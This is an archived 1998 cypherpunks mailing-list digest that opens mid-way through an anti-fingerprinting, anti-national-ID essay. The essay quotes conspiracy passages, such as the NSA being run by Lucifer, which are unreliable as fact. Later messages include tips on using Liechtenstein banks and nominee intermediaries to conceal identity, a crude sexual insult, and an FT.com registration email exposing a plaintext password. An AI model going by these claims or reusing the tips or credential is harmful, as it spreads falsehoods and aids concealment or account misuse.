*   they expect the test in five years to go from $700 each to a mere $10 and
*   take only hours or minutes to accomplish.


And how much hardware is a handheld fingerprint device?

*   "Lucent in New Identification Joint Venture"
*   The New York Times, 5/22/97
*   
*   Lucent Technologies [Bell Labs is their research and development arm] and
*   U.S. Venture Partners said today that they had formed a company that would
*   make products to help people prove their identities through electronic
*   fingerprinting technology.
*   
*   The first product of the company, Veridicom Inc., will be a postage-size
*   fingerprint sensor used to retrieve information, authorize purchases or
*   allow entry into restricted areas.
*   
*   The postage-size sensor will measure the ridges and valleys on the skin
*   when a finger is pressed against a silicon chip, and then check the
*   measurements against the user's profile.

Not big at all, is it?

#   "Faster, More Accurate Fingerprint Matching"
#   By Andrea Adelson, The New York Times, October 11 1992
#   
#   "We think there will be a revolution in fingerprinting," said David F.
#   Nemecek, a deputy for the FBI's Information Service Division.
#   
#   The next step is for manufacturers to make a single-finger mobile scanner
#   for use in patrol cars. Some FBI cars are expected to get them next year.

$   "The Body As Password", By Ann Davis, Wired Magazine, July 1997
$   
$   In October 1995, the Federal Highway Administration awarded a $400,000
$   contract to San Jose State University's College of Engineering to develop
$   standards for a "biometric identifier" on commercial driver's licenses and
$   for use in a centralized national database.

A centralized national database of biometric information for cross-state
driver's licenses, and all individual state driver's license fingerprints
available via the FBI's NCIC.


*   "Project L.U.C.I.D.", by Texe Marrs, 1996, ISBN 1-884302-02-5
*   
*   News reports indicate that, like California, practically all of the 50
*   states are in the process of installing news systems for drivers licenses,
*   often incorporating biometric measurements such as digitization of finger-
*   prints. That these systems are linked together gives us an indication of
*   the powerful grip our hidden controllers have on this nation.
*
*   All federal agencies are being integrated into this data net. These Police
*   State agencies constitute a clear and present danger, not only to the
*   privacy and constitutional rights of Americans but to our very lives!
*
*   A Hitler, a Pol Pot, or a Stalin would have loved to have had the
*   microchips, surveillance cameras, lasers, computers, satellites, weapons,
*   wiretap circuits and communications gadgetry of today's Dick Tracy Police
*   State.
*
*   Perhaps FBI Director Louis Freeh said it best shortly after his
*   appointment to the Federal Bureau of Investigation in 1993. Referring
*   to the incredible array of computerized control and battle gadgetry
*   available to federal law enforcement, Freeh, stressing cooperation
*   between his own FBI and the other alphabet police agencies, sardonically
*   remarked, "LET'S SHARE OUR TOYS."
*
*   Dick Tracy, of course, was a good guy. But Dick Tracy would have
*   recognized as unconstitutional the worldwide comprehensive Orwellian
*   system that has been installed, and reject it as a menace to true law
*   and order.


!   "Welfare Recipients Lose Benefits Through Glitches in Computers"
!   By Joe Sexton, The New York Times, 5/16/96
!   
!   The fingerprint-imaging system that is a central element of the Giuliani
!   administration's effort to crack down on welfare fraud has resulted in
!   hundreds of recipients cases being closed.
!   
!   The public advocate's office has been inundated with complaints from
!   improper case closings.
!   
!   The failure seems to stem from the local offices not transmitting the
!   fingerprints to Albany's central computer. This resulted in AUTOMATICALLY
!   TERMINATING BENEFITS OF PEOPLE THE COMPUTER THOUGHT WERE NOT FINGERPRINTED.


----


Prior to the fingerprint "final solution" of control over us, there were
other attempts---which would have required a vote---which tried to roll
out a National ID Card.

*   "Project L.U.C.I.D.", by Texe Marrs, 1996, ISBN 1-884302-02-5
*   
*   Since total and absolute control can be obtained only by a Police State
*   bureaucracy, efforts have escalated in recent years to require a National
*   ID Card.
*   
*   Upon Bill Clinton's election as President, Secretary of Health and Human
*   Services Donna Shalala and Massachusetts Senator Edward Kennedy jointly
*   developed a $100 million plan to require all children and babies to have
*   a dossier established in a national computer registry to insure "universal
*   mandatory vaccinations."
*   
*   When patriotic Americans rose up to protest, the U.S. Senate quietly
*   shelved the deceptive Shalala-Kennedy proposal.
*   
*   The Clinton administration next surfaced with its mandatory health care
*   plan. A key component of this plot to socialize medical care was the
*   requirement of a computer I.D. card for every American, linked to a master
*   computer network.
*   
*   Martin Anderson, writing in The Washington Times:
*
*       President Clinton held the pretty red, white and blue "smart card" in
*       his hand when he addressed the nation, proudly waving it like a small
*       American flag.
*
*       Only it wasn't a flag; it was a "health security card"---his slick
*       name for a national identity card. Under his plan a new National
*       Health Board would establish "national, unique identifier numbers"
*       for every single one of us.
*
*       Fortunately, President Bill Clinton's healthcare scam never made it
*       into law. Sadly, few of the complainers were upset about the potential
*       for abuse by Big Brother.
*
*   Shortly after being elected, one Clinton advisor promoting the biochip
*   'mark' is Dr. Mary Jane England, a member of Hillary Clinton's ill-fated
*   socialized, national healthcare initiative. Addressing a conference
*   sponsored by computer giant IBM [IBM's Lotus division takes hand biometrics
*   of employees who use their childcare facilities] in Palm Springs,
*   California, in 1994, England not only endorsed the proposed mandatory
*   national I.D. smart card, but went one scary step further:
*
*       The smart card is a wonderful idea, but even better would be the
*       capacity to not have a card, and I call it "a chip in your ear,"
*       that would actually access your medical records, so that no matter
*       where you were, even if you came into an emergency room unconscious,
*       we would have some capacity to access that medical record.
*
*       We need to go beyond the narrow conceptualization of the smart card
*       and really use some of the technology that's out there.
*
*   California Governor Pete Wilson has actively stumped for a National I.D.
*   Card system, using the straw man of California's pervasive immigration
*   problem. California Senators Diane Feinstein and Barbara Boxer support
*   it too. The latest proposal is to mandate I.D. cards for all school
*   children under the Goals 2000 national education program. Another plan
*   by the U.S. Labor Department would have required it for all users of a
*   National Job Training and Employment database.
*
*   George Orwell, in 1984, his classic novel of Big Brother and a coming
*   totalitarian state, observed that very few people are awake and alert
*   to the machinations and manipulations of the controllers. Thus, the
*   people, as a whole, fall victim to a colossal conspiracy out of ignorance
*   and because of apathy and denial of reality:
*
*       The people could be made to accept the most flagrant violations of
*       reality, because they never fully grasped the enormity of what was
*       demanded of them, and were not sufficiently interested in public
*       events to notice what was happening.
[
    By Walter Cronkite: "Orwell's '1984'---Nearing?", NYT, June 5 1983

    In our world, where a Vietnam village can be destroyed so it can be
    saved; where the President names the latest thing in nuclear missiles
    "Peacekeeper"---in such a world, can the Orwellian vision be very far
    away?

    Big Brother's ears have plugs in them right now (or they are, by law,
    supposed to), at least on the domestic telephone and cable traffic.

    But the National Security Agency's ability to monitor microwave
    transmissions, to scoop out of the air VAST numbers of communications,
    including telephone conversations, store them in computers, play them
    back later, has a truly frightening potential for abuse.

    George Orwell issued a warning.

    He told us that freedom is too much taken for granted, that it needs to
    be carefully watched and protected. His last word on the subject was a
    plea to his readers: "Don't let it happen. It depends on you."
]
*
*   The National Security Agency's Project L.U.C.I.D., with all its
*   technological wizardry, is a future, planetary dictator's dream---and a
*   Christian and national patriot's nightmare. Someday, the Holy Bible
*   prophesies, that planetary dictator will emerge on the scene, lusting
*   for blood...
*
*   There can be no doubt about it.
*
*   The REAL Chief Executive Officer of the NSA is not a human being.
*
*   The CEO MUST be Lucifer himself.

Amen.


----


It is technology driving the capabilities, it is our government using
them ruthlessly: without letting us vote on it.

Never before could someone walk up to you and number you by scanning
your fingerprints. A number that is yours and yours alone.

You have been numbered for all time.

No ID card needed once portable fingerprint scanners are deployed all over!

If the government suddenly ordered all citizens to be numbered with an
indelible invisible ink on their arms so they were permanently numbered;
so law enforcement could scan them at will: there would be a revolt.

Yet that is what is happening.

Fingerprints, scanned into a computer, are a number.

The number is inescapably yours.

Modern technology means they don't have to put the number on you, they can
read it off of you by minutely examining your body.

And: it is the NSA driving the fingerprint-rollout of the national ID card.

#   "The Body As Password", By Ann Davis, Wired Magazine, July 1997
#   
#   Currently housed at the National Security Agency, a working group of
#   federal bureaucrats founded the Biometric Consortium in the early 1990s.
#   Its 1995 charter promises to "promote the science and performance of
#   biometrics for the government."
#   
#   Consortium mumbers include state welfare agencies, driver's license
#   bureaus, the Immigration and Naturalization Service, the Social Security
#   Administration, and the Internal Revenue Service.


If my attempts to show how bad a thing this is have been too rambling,
too abstract, here is a simple and accurate analogy:

*   "Project L.U.C.I.D.", by Texe Marrs, 1996, ISBN 1-884302-02-5
*
*   It was Martin Anderson who, in his book, Revolution, revealed that during
*   the Reagan administration during the 1980s, several top cabinet officials
*   were urging President Ronald Reagan to implement a computerized National
*   I.D. Card.
*
*   The rationale for the proposal was that such a system would help put a lid
*   on illegal immigration. [Reagan had been Governor of California]
*
*   But Anderson, who at the time was a domestic advisor to the President and
*   sat in on this particular cabinet meeting, spoke up and gave the group
*   something to think about.
*
*   "I would like to suggest another way that I think is a lot better," he
*   told them, serious in demeanor but clearly being facetious. "It's a lot
*   cheaper, it can't be counterfeited. It's very lightweight, and it's
*   impossible to lose. It's even waterproof."
*
*   "All we have to do," Anderson continued, "is tattoo an identification
*   number on the inside of everybody's arm."
*
*   His reference was to the tattooing of numbers on victims in Nazi
*   concentration camps. Survivors still bear the dreaded tattoo markings
*   to this day.
*
*   Mr. Anderson described the stunned reaction of those present, "There were
*   several gasps around the table. A couple cabinet members looked as if they
*   had been slapped. No one said anything for a long time."
*
*   Ronald Reagan, a consummately wise politician who professed a belief in
*   Bible prophecy, caught the implication [about The Mark of the Devil].
*
*   He then hushed the cabinet and efficiently dismissed the National ID Card
*   proposal by sardonically remarking, "Maybe we should just brand all babies."



        "Those that give up essential liberty for a little
         security, deserve neither liberty nor security."
                                        - Ben Franklin

         
        "When ID's are mandatory, it is time to leave the planet."
                                        - Robert Heinlein


*   "Project L.U.C.I.D.", by Texe Marrs, 1996, ISBN 1-884302-02-5
*
*   In the November 1994 publication of the FBI Law Enforcement Bulletin,
*   the FBI advocated BIOMETRIC CAPTURE FOR ALL NEWBORN BABIES AND
*   SIMULTANEOUSLY THEIR MOTHERS.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 5 Feb 1998 11:37:01 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Rogue root domain reconfiguration [CNN]
Message-ID: <199802050334.VAA00469@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

>           ADMINISTRATION SAYS INTERNET RECONFIGURATION WAS ROGUE TEST
>                                        
>      graphic February 4, 1998
>      Web posted at: 9:29 p.m. EST (0229 GMT)
>      
>      WASHINGTON (AP) -- The Clinton administration said Wednesday it was
>      confident a researcher in California won't repeat his rogue
>      reconfiguration of the Internet -- a test that few users noticed but
>      that raised concerns about how the worldwide network is run.
>      
>      Jon Postel, who runs the Internet Assigned Numbers Authority at the
>      University of Southern California under a Defense Department
>      contract, last week redirected half the Internet's 12
>      directory-information computers to his own system.
>      
>      Normally, those so-called "root servers" help users find addresses
>      on the Internet by pulling data from Network Solutions Inc., a
>      private company in northern Virginia that operates under a federal
>      government contract.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Attila T. Hun" <attila@hun.org>
Date: Thu, 5 Feb 1998 05:43:29 +0800
To: "Steve Orrin" <cypherpunks@cyberpass.net>
Subject: Re: HUMOR: Bill Gates gets it, PRESERVED for the FUTURE!
In-Reply-To: <19980204190827281.AAA314.381@endor.syndata.domain>
Message-ID: <19980204.213032.attila@hun.org>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

>http://www.cnn.com/TECH/computing/9802/04/belgium.gates.ap/
>A Picture Tells A Thousand Words.

    yes, it does.  he still looks like a geek.

    and since CNN archives are spotty, it is now preserved for the
    future.  (available tonight)

        http://www.primenet.com/~attila/rants/gates/8204-belgium_gates.html

    made my day!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: No safety this side of the grave. Never was; never will be

iQBVAwUBNNjfC7R8UA6T6u61AQEE/AH9EWvCnUmxs8e/+KynguU8mu+Pmbc/f525
N1EK9hdp5HgGHBiVBmENP78iNCF1miREtKTvBGmSqpH0DEAzpHprEA==
=NKvr
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Attila T. Hun" <attila@hun.org>
Date: Thu, 5 Feb 1998 06:05:07 +0800
To: Robert Hettinga <unicorn@schloss.li
Subject: Re: The Continued Attack on Cash (Was: "The Right of  Anonymity"...)
In-Reply-To: <v04003a0eb0fce6005c81@[139.167.130.248]>
Message-ID: <19980204.215246.attila@hun.org>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

on or about 980203:1053, in <v04003a0eb0fce6005c81@[139.167.130.248]>, 
    Robert Hettinga <rah@shipwright.com> was purported to have 
    expostulated to perpetuate an opinion:

>The cost of anything is the foregone alternative. People will only demand
>more privacy when it's cheaper than not having it. I believe that that
>time is coming, rather quickly.
>
    that, and 

        "Americans do not buy for quality, they buy for price"


    as John Ruskin said:

    1.  those who buy for price alone are this man's lawful prey.

    2.  the price of oats is significantly cheaper when it has been
        processed by the horse.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: No safety this side of the grave. Never was; never will be

iQBVAwUBNNjj0LR8UA6T6u61AQF/VgH+I8k5TPa9u0mjBOZbhB+zl+C6Eo0yH4gY
9fgqICC+hmhzIQe1l1a9Y/3n0rWu5K6cWsTSzSF8KC4XyyLwH8fGQQ==
=tQT9
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Attila T. Hun" <attila@hun.org>
Date: Thu, 5 Feb 1998 06:28:09 +0800
To: "James O'Toole" <dcsb@ai.mit.edu>
Subject: RE: The Continued Attack on Cash (Was: "The Right of Anonymity"...)
In-Reply-To: <01BD308B.1A566960@slip-james.lcs.mit.edu>
Message-ID: <19980204.220302.attila@hun.org>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

on or about 980203:1003, in <01BD308B.1A566960@slip-james.lcs.mit.edu>, 
    "James O'Toole" <otoole@lcs.mit.edu> was purported to have 
    expostulated to perpetuate an opinion:

>Pretty soon we'll run up against the problem of whether Tim May can
>configure a corporate in the U.S. to be operated by people who don't know
>who he is, and who can't find out who he is (when properly encouraged to
>cooperate by Ken Starr...).  With or without government regulation, the
>most reliable people you can hire to operate that corporation for you may
>only want to do so if they are given the opportunity to somehow "know"
>you.

    in the U.S. the _best_ you will ever do is run a smokescreen

>I think you can probably use a bank in a privacy-enhancing-locale such as
>Switzerland as an effective intermediary in Amex card issuance, but if
>you really don't want the bank to know who you are, you'll probably need
>a corporate intermediary between you and the bank, with nominee
>officers.

    dont use Switzerland; it has been translucent for at least 20     
    years and is fast approaching transparency.

    Lichtenstein --if you can get an introduction into Landesbank from
    a local 'truehand'   --even better, if you can get into the PrivatBank.
    just remember, if it is the former, as you enter the main circle in
    Vaduz from the south, get out and kiss the bricks.  if you can not
    get the introduction, dont count on the extra services. secondly,
    you can not own anything in Lichtenstein without a residency permit
    and good luck on that one.  as they say: no further information 
    available....

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: No safety this side of the grave. Never was; never will be

iQBVAwUBNNjnjrR8UA6T6u61AQEpvwH6Aia+pitmw1OyX9y5A8D9cWRGMUTTa3EC
wJTuUErBab1sWqJihJ755LHiyqpktBBVMO84TBtJPHnHMJoQqGIXNg==
=fsE0
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Attila T. Hun" <attila@hun.org>
Date: Thu, 5 Feb 1998 06:29:08 +0800
To: Jim Choate <cypherpunks@cyberpass.net>
Subject: Re: The Continued Attack on Cash (Was: "The Right of Anonymity"...)
In-Reply-To: <199802021912.NAA29247@einstein.ssz.com>
Message-ID: <19980204.221436.attila@hun.org>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

on or about 980202:1312, in <199802021912.NAA29247@einstein.ssz.com>, 
    Jim Choate <ravage@ssz.com> was purported to have 
    expostulated to perpetuate an opinion:

>>     well, in the first place, you live in Texas where the
>>     attitude to the Feds is rather strong --not as strong as our
>>     attitude in rural Utah where the usual transaction is in
>>     cash.  out here, a Fed is the same as a revenuer in Eastern
>>     Kentucky or Tennessee.  reminds me of the Fed approaching a
>>     child and telling him he'd give him $5 if he took him to his
>>     father (still) --the boy asked for the money up front. when
>>     the Fed asked why, the boy said: "...'cause you aint coming 
>>     back".

>You don't know Texas or Texans very well...

    well, I do, real well  --but you dont know rural Utahns.

    in reality, it's probably a tradeoff.  one of the reasons the
    Democrats use Utah as a dumping ground or national park is we dont
    give them any votes. you also need to remember that the first
    day of deer hunting season here is a holiday --and the number 
    of firearms/capita leads the nation --keep in mind how many kids
    us Mormons have --5 is considered a slacker....

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: No safety this side of the grave. Never was; never will be

iQBVAwUBNNjpy7R8UA6T6u61AQH0sgH/d41HFQhKoLNqaIbgOr8Cl/SoPPq22R14
u6U2LuACWTwTfl/0zM1K8B7GmX87Mdx9xPysfeyf/y6d4wSyDwNjKg==
=7Ewg
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 5 Feb 1998 12:36:04 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Fingerprinting...
Message-ID: <199802050435.WAA00790@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

Check out 'Super Cop' on TLC...


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 5 Feb 1998 12:23:58 +0800
To: cypherpunks@toad.com
Subject: Re: Changing to Moderated Cypherpunks -- How?
In-Reply-To: <199802050343.DAA46984@out5.ibm.net>
Message-ID: <5aueke19w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



"James F. Marshall" <marshall@ibm.net> writes:

> Too much noise in the unedited list.
>
> How does one change to the moderated list?

You ask John Gilmore and Sandy Sandfart if you can suck their cocks.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 5 Feb 1998 13:28:26 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Changing to Moderated Cypherpunks -- How? (fwd)
Message-ID: <199802050525.XAA01010@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 5 Feb 1998 00:05:08 -0500 (EST)
> From: Information Security <guy@panix.com>
> Subject: Re: Changing to Moderated Cypherpunks -- How?

> I'd be glad to handle it.
> 
> The only criteria is to delete Dr. Dim and his nyms.
> 
> Would toad.com give me a mail hook to send back to,
> or am I supposed to setup my own majordomo?

I'll provide you a feed if you find that acceptable, unfortunately I am not
able to provide an account on SSZ to run it off of. My suspicion is that
you'll need a majordomo or similar remailer package (possibly with procmail
for duplicate filtering). I also strongly suggest you get your feed as a CDR
member and not a subscriber to a given list. That way if one node goes down
it won't leave you out in the cold (necessarily). You also probably don't
want to use a system that hosts a CDR node in case that site drops off the
net.

Good luck.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Thu, 5 Feb 1998 13:20:11 +0800
To: cypherpunks@toad.com
Subject: Re: Changing to Moderated Cypherpunks -- How?
Message-ID: <199802050505.AAA01452@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Dimitry "I've been like this since my prostrate operation" The Dim wrote:
>   You ask John Gilmore and Sandy Sandfart if you can suck their cocks.

I'd be glad to handle it.

The only criteria is to delete Dr. Dim and his nyms.

Would toad.com give me a mail hook to send back to,
or am I supposed to setup my own majordomo?

First: how many people are interested?

I suppose I could split it in two: the other for actual crypto comments.

I'd not suggest it myself, because our concerns have to be
wider than just that.

Regarding everyone in the US being fingerprinted in a sneakily-rolled-out
manner:

CCC...

We can't encrypt our fingerprints, dammit.
---Information Security





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Attila T. Hun" <attila@hun.org>
Date: Thu, 5 Feb 1998 08:19:33 +0800
To: Information Security <attila@primenet.com>
Subject: Fingerprinting in CA [was Whoa: British SmartCard rollout]
In-Reply-To: <199802040323.WAA16673@panix2.panix.com>
Message-ID: <19980205.000739.attila@hun.org>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

on or about 980203:2223, in <199802040323.WAA16673@panix2.panix.com>, 
    Information Security <guy@panix.com> was purported to have 
    expostulated to perpetuate an opinion:

>   How did you CA cypherpunks feel about being fingerprinted?

    well, I would have gone up to Nevada to get a license, but they
    have been doing it longer than CA.  now Utah is doing it....
    it will be universal before long. when I asked in CA if I could
    refuse to be fingerprinted, they said; "sure... as long as you 
    dont want a license"  --real white of 'em.  Utah said basically
    the same thing.

    that and they already have us feeling like.

        when cash is outlawed,
        only outlaws will have cash.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: No safety this side of the grave. Never was; never will be

iQBVAwUBNNkD37R8UA6T6u61AQGIrgH+JJ0ZcKx52zDG9VKAA1t02Qvlp0D2Jq7A
/jx1FBDn0pydATuRVItBXZvv8rP4RjaRgrBqtM7duPDg2MA0ctgWeQ==
=nWmP
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kris Carlier <root@iguana.be>
Date: Thu, 5 Feb 1998 07:39:42 +0800
To: "Attila T. Hun" <attila@hun.org>
Subject: Re: HUMOR: Bill Gates gets it, PRESERVED for the FUTURE!
In-Reply-To: <19980204.213032.attila@hun.org>
Message-ID: <Pine.LNX.3.95.980205004619.10104E-100000@inlimbox.iguana.be>
MIME-Version: 1.0
Content-Type: text/plain



>     made my day!

yeah right...  First of all, Bill Gates was received overhere like a king. 
He talked to a bunch of ministers, the prince, and above all, he got
something that can be considered as the biggest honor one can get: a
whipped cream cake in the face. If you're considered unimportant, you
don't get one in the face at all. 

I think he didn't mind though: BG signed a contract with Mr Vanden Brande,
the Flemish number one minister, for the PC Kadee project: M$ will
-happily- install 40.000 (fourty thousand !!) PC's with their software on
it. The project is for K12 and up (pre-college) schools. M$ will not
donate this of course, we in Belgium are dumb enough to gladly PAY (a
so-called reduced price) for this kind of joke. 

So no, I'm not too happy at all about this incident. Would have been
better if he didn't get this kind of attention. 
                                                  
kr=


                   \\\___///
                  \\  - -  //
                   (  @ @  )
 +---------------oOOo-(_)-oOOo-------------+
 |     kris carlier - carlier@iguana.be    |
 | Hiroshima 45, Tsjernobyl 86, Windows 95 |
 | Linux, the choice of a GNU gener8ion    |
 |            SMS: +32-75-61.43.05         |
 +------------------------Oooo-------------+
                  oooO   (   )
                 (   )    ) /
                  \ (    (_/
                   \_)








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Site.Feedback@FT.com
Date: Thu, 5 Feb 1998 11:52:26 +0800
To: cypherpunks@toad.com
Subject: FT.com Registration
Message-ID: <9802050344.AA44748@svr1en0.ft.com>
MIME-Version: 1.0
Content-Type: text/plain



This mail is to confirm your registration with FT.com, the Financial Times' web site.

Please keep this note of your username and password in a safe place to look up should you forget them.

If you have any problems getting into and around the site at any time please first try our help pages at http://www.ft.com/about/index.htm . These are open pages which don't require you to log in. If after reading them you still have difficulties, then contact us by email at site.feedback@ft.com .

User name - hackworth
Password - writecode

The Internet Team @ FT.com.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Roger J Jones <cyber@ibpinc.com>
Date: Thu, 5 Feb 1998 22:25:34 +0800
To: cypherpunks@cyberpass.net
Subject: No Subject
Message-ID: <199802051403.IAA12716@pc1824.ibpinc.com>
MIME-Version: 1.0
Content-Type: text/plain




> > > I'm here to ask
> > > As you'll soon see
> > > Did you grope
> > > Miss Lewinsky?
> > > Did you grope her
> > > in your house?
> > > Did you grope
> > > Beneath her blouse?
> > > 
> > > I did not do that
> > > Here nor there
> > > I did not do that
> > > Anywhere!
> > > I did not do that
> > > Near nor far
> > > I did not do that
> > > Starr-You-Are.
> > > 
> > > Did you smile?
> > > Did you flirt?
> > > Did you peek
> > > Beneath her skirt?
> > > And did you tell
> > > The girl to lie
> > > When called upon
> > > To testify?
> > > 
> > > I do not like you
> > > Starr-You-Are
> > > I think that you
> > > Have gone too far.
> > > I will not answer
> > > Anymore
> > > Perhaps I will go
> > > Start a war!
> > > 
> > > The public's easy
> > > To distract
> > > When bombs are
> > > Falling on Iraq!
> > > 
> > 
> 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 5 Feb 1998 22:23:53 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: update.357 (fwd)
Message-ID: <199802051415.IAA01650@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 4 Feb 1998 11:01:53 -0500 (EST)
> From: physnews@aip.org (AIP listserver)
> Subject: update.357
> 
> A QUANTUM TUNNELING TRANSISTOR, an on-off switch
> that exploits an electron's ability to pass through normally
> impenetrable barriers, has been built by Sandia researchers (Jerry
> Simmons, 505-844-8402), opening possibilities for record-speed
> transistors that can be mass-produced with current nanotechnology. 
>  In their device, the researchers control the flow of electrons
> between two GaAs layers (each only 15 nm thick) separated by an
> AlGaAs barrier (12 nm).  Although the electrons in GaAs
> ordinarily do not have enough energy to enter the AlGaAs barrier,
> the layers are so thin (comparable in size to the electron
> wavelength) that the electrons, considered as waves rather than
> particles, can spread into the barrier and, with an appropriate
> voltage applied, out the other side.  In the process, the electron
> waves do not collide with impurity atoms, in contrast to a
> traditional transistor's particlelike electrons, which are slowed
> down by these collisions.  Transistors that switch on and off a
> trillion times per second--5 times faster than the current record--are
> possible with this approach.  Although quantum tunneling
> transistors were first built in the late 1980s, it was originally
> infeasible to mass-produce them.  Previous researchers engraved
> the ultrathin GaAs and AlGaAs features side-by-side on a surface,
> something hard to do reliably with present-day lithography. 
> Therefore the Sandia researchers stacked the features vertically, by
> using readily available techniques such as molecular beam epitaxy
> which can deposit layers of material with single-atom thicknesses. 
> Having made quantum-tunneling memory devices and digital logic
> gates operating at 77 K, the researchers expect room-temperature
> devices in the next year.  (J.A. Simmons et al., upcoming article
> in Applied Physics Letters; figure at
> www.aip.org/physnews/graphics)
> 

[text deleted]


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mark@unicorn.com
Date: Fri, 6 Feb 1998 00:36:19 +0800
To: cypherpunks@cyberpass.net
Subject: Re: the best justice money can buy --Lessig
Message-ID: <886695836.699.193.133.230.33@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



Atilla wrote:
>no, in fact, if there were a free market remedy for M$'
>monopoly, I would be in favour of it --and there is _no_
>free market remedy and failure to act promptly 
>conceivably wipe out all, or virtually all, of the 
>viable competitors.

Of course there's a free-market remedy for Microsoft; eliminate copyright. If
anyone can copy Microsoft software for free, it would be forced to compete
on real benefits rather than installed base.

This is why I have no sympathy with those who claim Microsoft is the victim
in the anti-trust suits, even though I'm opposed to such action in general; 
those whose profits depend on the 800-pound gorilla can hardly complain when 
it falls on them.

    Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes <jim.burnes@ssds.com>
Date: Fri, 6 Feb 1998 00:46:43 +0800
To: "Attila T. Hun" <attila@hun.org>
Subject: Re: Fingerprinting in CA
In-Reply-To: <19980205.000739.attila@hun.org>
Message-ID: <34D9EBBB.EF470B19@ssds.com>
MIME-Version: 1.0
Content-Type: text/plain



Attila T. Hun wrote:
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> on or about 980203:2223, in <199802040323.WAA16673@panix2.panix.com>,
>     Information Security <guy@panix.com> was purported to have
>     expostulated to perpetuate an opinion:
> 
> >   How did you CA cypherpunks feel about being fingerprinted?
> 
>     well, I would have gone up to Nevada to get a license, but they
>     have been doing it longer than CA.  now Utah is doing it....
>     it will be universal before long. when I asked in CA if I could
>     refuse to be fingerprinted, they said; "sure... as long as you
>     dont want a license"  --real white of 'em.  Utah said basically
>     the same thing.
> 

If your interested in this problem, I believe that the Georgia
wing
